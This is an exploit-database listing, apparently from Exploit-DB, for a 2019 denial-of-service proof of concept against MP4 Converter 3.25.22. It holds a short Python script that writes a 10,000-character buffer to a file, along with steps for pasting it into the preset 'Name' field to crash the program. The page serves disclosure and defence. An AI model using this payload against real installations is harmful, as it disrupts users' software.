header-logo
Suggest Exploit
vendor:
MP4 Converter
by:
Alejandra Sánchez
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: MP4 Converter
Affected Version From: 3.25.22
Affected Version To: 3.25.22
Patch Exists: NO
Related CWE: N/A
CPE: a:tomabo:mp4_converter
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2019

MP4 Converter 3.25.22 – ‘Name’ Denial of Service (PoC)

This exploit is a proof of concept for a denial of service vulnerability in MP4 Converter 3.25.22. The vulnerability is triggered when a user attempts to add a preset with a large name. The user must copy the text from the generated MP4Converter.txt file to clipboard, open MP4 Converter, select 'Options' > 'Video/Audio Formats', click 'Add Preset' and paste clipboard in the field 'Name', click 'OK' and click 'Reset All'. This will cause the application to crash.

Mitigation:

The user should avoid adding presets with large names. The vendor should also implement input validation to prevent large inputs from crashing the application.
Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: MP4 Converter 3.25.22 - 'Name' Denial of Service (PoC)
# Date: 14/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.tomabo.com/
# Software: http://www.tomabo.com/downloads/mp4-converter-setup.exe
# Version: 3.25.22
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "MP4Converter.py", it will create a new file "MP4Converter.txt"
# 2.- Copy the text from the generated MP4Converter.txt file to clipboard
# 3.- Open MP4 Converter
# 4.- Select 'Options' > 'Video/Audio Formats'
# 5.- Click 'Add Preset' and paste clipboard in the field 'Name'
# 6.- Click 'OK' and click 'Reset All' 
# 7.- Crashed

buffer = "\x41" * 10000
f = open ("MP4Converter.txt", "w")
f.write(buffer)
f.close()